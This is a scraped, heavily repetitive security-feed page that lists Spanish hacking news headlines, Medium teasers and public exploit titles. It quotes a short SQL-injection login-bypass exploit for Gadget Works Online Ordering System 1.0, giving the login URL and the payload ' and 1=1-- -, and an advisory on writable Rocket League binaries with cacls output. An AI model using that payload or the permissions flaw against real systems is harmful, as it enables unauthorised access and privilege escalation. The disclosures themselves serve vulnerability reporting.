Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Investigadores descubren operación de ransomware patrocinada por el estado iraní.
https://cdn-images-1.medium.com/max/833/0*LIUP_KXvMRGm_xkT
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Investigadores descubren operación de ransomware patrocinada por el estado iraní.
https://cdn-images-1.medium.com/max/833/0*LIUP_KXvMRGm_xkT
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Investigadores descubren operación de ransomware patrocinada por el estado iraní.
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Falla de seguridad expone la información clínica de millones de pacientes en Colombia y el mundo
https://cdn-images-1.medium.com/max/1560/1*OtUxgY_shRZP43UJi-wN2w.png
TL;DR
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Falla de seguridad expone la información clínica de millones de pacientes en Colombia y el mundo
https://cdn-images-1.medium.com/max/1560/1*OtUxgY_shRZP43UJi-wN2w.png
TL;DR
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Falla de seguridad expone la información clínica de millones de pacientes en Colombia y el mundo
TL;DR
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Vulnerabilidad en la validación de IP afecta a Python.
https://cdn-images-1.medium.com/max/1209/0*hWxS5ALjwNvBjArF
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Vulnerabilidad en la validación de IP afecta a Python.
https://cdn-images-1.medium.com/max/1209/0*hWxS5ALjwNvBjArF
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Vulnerabilidad en la validación de IP afecta a Python.
PUBLICADO EN 3 MAYO, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Active Directory: LLMNR Poisoning
https://cdn-images-1.medium.com/max/2600/0*yZOBFjs-jcFVcykN
What is LLMNR Poisoning?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Active Directory: LLMNR Poisoning
https://cdn-images-1.medium.com/max/2600/0*yZOBFjs-jcFVcykN
What is LLMNR Poisoning?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Active Directory: LLMNR Poisoning
What is LLMNR Poisoning?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Improving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the…
https://cdn-images-1.medium.com/max/2600/0*D08qQ3oL-tSCzhNm
Context
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Improving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the…
https://cdn-images-1.medium.com/max/2600/0*D08qQ3oL-tSCzhNm
Context
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Improving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the risk of false positives
Context
HOW I FOUND XSS IN PRIVATE PROGRAM
Hi there, Hope you all are doing great and healthy.Continue reading on Medium »
Read more...
Hi there, Hope you all are doing great and healthy.Continue reading on Medium »
Read more...
Exploit Collector
Windows/x64 Dynamic NoNull Add RDP Admin Shellcode
___________________________
@hacking_Attack
@Hacking_Video
Windows/x64 Dynamic NoNull Add RDP Admin Shellcode
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Windows/x64 Dynamic NoNull Add RDP Admin Shellcode
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Windows/x64 Dynamic Null-Free WinExec PopCalc Shellcode
___________________________
@hacking_Attack
@Hacking_Video
Windows/x64 Dynamic Null-Free WinExec PopCalc Shellcode
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Windows/x64 Dynamic Null-Free WinExec PopCalc Shellcode
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
GetSimple CMS Custom JS 0.1 CSRF / XSS / Code Execution
___________________________
@hacking_Attack
@Hacking_Video
GetSimple CMS Custom JS 0.1 CSRF / XSS / Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
GetSimple CMS Custom JS 0.1 CSRF / XSS / Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Gadget Works Online Ordering System 1.0 SQL Injection
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
Gadget Works Online Ordering System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Gadget Works Online Ordering System 1.0 SQL Injection
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
Gadget Works Online Ordering System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
a2eaa3a011a8f97e9215605c8c9e6fb1Download
# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4
Steps:
*Replace IP with the website IP
1). Goto login page (http://IP/philosophy/admin/login.php?logout=1)
2). For username and password enter for both fields the below payload and hit login.
Payload:
' and 1=1-- -
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Gadget Works Online Ordering System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Epic Games Rocket League 1.95 Insecure Permissions
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Epic Games Rocket League versions 1.95 and below suffer from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Epic Games Rocket League 1.95 Insecure Permissions
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Epic Games Rocket League versions 1.95 and below suffer from an insecure permissions vulnerability.
MD5 |
9ed5a4f67cb00f02b0ffb67ded384d2cDownload
Epic Games Psyonix Rocket League <=1.95
Vendor: Epic Games Inc. | Psyonix, LLC
Product web page: https://www.epicgames.com
https://www.psyonix.com
https://www.rocketleague.com
Affected version:
Summary: Rocket League is a high-powered hybrid of arcade-style soccer
and vehicular mayhem with easy-to-understand controls and fluid, physics-driven
competition.
Desc: The application suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the executable
file with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'F' flag (Full) for 'Authenticated Users' group.
Tested on: Microsoft Windows 10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5650
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5650.php
20.04.2021
--
E:\Epic Games\rocketleague\Binaries\Win64>cacls RocketLeague.exe
E:\Epic Games\rocketleague\Binaries\Win64\RocketLeague.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\Authenticated Users:C
BUILTIN\Users:R
E:\Epic Games\rocketleague>cacls Binaries
E:\Epic Games\rocketleague\Binaries BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
NT AUTHORITY\Authenticated Users:C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
E:\Epic Games\rocketleague>cacls TAGame
E:\Epic Games\rocketleague\TAGame BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
NT AUTHORITY\Authenticated Users:C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Epic Games Rocket League 1.95 Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.